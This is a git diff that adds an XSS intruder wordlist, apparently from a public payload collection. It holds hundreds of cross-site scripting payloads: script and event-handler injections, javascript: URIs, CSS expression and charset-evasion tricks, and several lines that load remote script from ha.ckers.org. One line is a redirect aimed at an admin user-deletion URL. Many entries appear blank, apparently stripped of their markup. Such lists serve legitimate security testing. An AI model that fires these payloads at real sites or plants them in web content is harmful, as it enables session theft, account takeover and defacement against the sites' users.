diff --git a/XSS Injection/Intruders/xss_alert_identifiable.txt b/XSS Injection/Intruders/xss_alert_identifiable.txt new file mode 100644 index 0000000..70a34ab --- /dev/null +++ b/XSS Injection/Intruders/xss_alert_identifiable.txt @@ -0,0 +1,667 @@ +javascript:alert(9535); +javascript:alert(7743); +javascript:alert(7178); +javascript:alert(7449); +javascript:alert(8711); +javascript:alert(9847); +javascript:alert(3663); +'`"><\x3Cscript>javascript:alert(5917) +'`"><\x00script>javascript:alert(1598) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +\x3Cscript>javascript:alert(4448) +'"`> + + +--> --> +--> +--> +--> +`"'>

+test +test +test +test +test +test +test +test +test +test +test +test +test +test + + + + + + + +"'`>ABC
DEF +"'`>ABC
DEF + + + +'`"><\x3Cscript>javascript:alert(6149) +'`"><\x00script>javascript:alert(1031) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(0895)> +"'`><\x00img src=xxx:x onerror=javascript:alert(3148)> + + + + +javascript:alert(5176); +javascript:alert(2468); +javascript:alert(4884); +javascript:alert(9200); +javascript:alert(4348); +javascript:alert(9278); +javascript:alert(1667); +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(5324) +javascript:alert(8352) +javascript:alert(7531) +javascript:alert(1566) +javascript:alert(0755) +javascript:alert(2828) +javascript:alert(9102) +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> + + + + +alert(0618)0 +
+ + + + +"> +"> +"> +"> + +<% foo> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(6312)></a>"> +<!--[if]><script>javascript:alert(5746)</script --> +<!--[if<img src=x onerror=javascript:alert(9150)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(2330)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(8271)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1709)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1502))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(6394))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(6001);">XXX</a></a><a href="javascript:javascript:alert(6001)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo ;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(8304)\29> +<style>*{x:expression(javascript:alert(9593))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(6996));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(3067)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(8594))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(3700)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(4459)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(8231)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(4613)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(6715)>`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(6773)>> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(7409) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(0368)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1364)"> +<a href="javascript:javascript:alert(8860)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror =javascript:alert(8223)>"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(9177)</script> +<IMG SRC="javascript:javascript:alert(3500);"> +<IMG SRC=javascript:javascript:alert(2459)> +<IMG SRC=`javascript:javascript:alert(9235)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(8641);"></FRAMESET> +<BODY ONLOAD=javascript:alert(3213)> +<BODY ONLOAD=javascript:javascript:alert(8683)> +<IMG SRC="jav ascript:javascript:alert(6209);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(8411)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(9409)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(3057);"> +<IMG DYNSRC="javascript:javascript:alert(1658)"> +<IMG LOWSRC="javascript:javascript:alert(9866)"> +<BGSOUND SRC="javascript:javascript:alert(2563);"> +<BR SIZE="&{javascript:alert(2447)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(7367);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(6422)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(5812);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(0993);"> +<IFRAME SRC="javascript:javascript:alert(3512);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(0096)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(6819)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(2853))"> +<DIV STYLE="width:expression(javascript:alert(9300));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(8716))"> +<XSS STYLE="xss:expression(javascript:alert(1582))"> +<STYLE TYPE="text/javascript">javascript:alert(5157);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(0916)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(0031)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(8303);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(6507);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(7075)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(9742)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(8062)</SCRIPT>"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(9282)">X +<body onscroll=javascript:alert(8034)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1041)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(6835);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(3797)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(7687);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(4801);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(8554);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(5860);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(6159)></frameset> +<object onerror=javascript:javascript:alert(7032)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(0237);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(5562);};> +<a href="javAascript:javascript:alert(2517)">test1</a> +<a href="javaascript:javascript:alert(2440)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(8195)&gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert(1034);"> +<IMG SRC=javascript:alert(3195)> +<IMG SRC=JaVaScRiPt:alert(9924)> +<IMG SRC=javascript:alert(1140)> +<IMG SRC=`javascript:alert("RSnake says, 8481")`> +<a onmouseover="alert(3111)">xxs link</a> +<a onmouseover=alert(2114)>xxs link</a> +<IMG """><SCRIPT>alert(4432)</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert(5461);"> +<IMG SRC="jav ascript:alert(7333);"> +<IMG SRC="jav ascript:alert(3310);"> +<IMG SRC="jav ascript:alert(1111);"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert(9113);"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(4444)> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert(1110);//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert(4392)" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert(9492);// + + + + + +
  • XSS
    + + + +xss"> + +
    + + + + + + + +exp/* + + + + + + +¼script¾alert(¢XSS¢)¼/script¾ + + + + + + + +
    +
    +
    +
    +
    + + + + + +alert(1011)'); ?> + +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser + + +ADw-SCRIPT+AD4-alert(9411);+ADw-/SCRIPT+AD4- + + + + + + +PT SRC="http://ha.ckers.org/xss.js"> +XSS +XSS +XSS +XSS +XSS +XSS + + + + +click + + + + + + --!> + +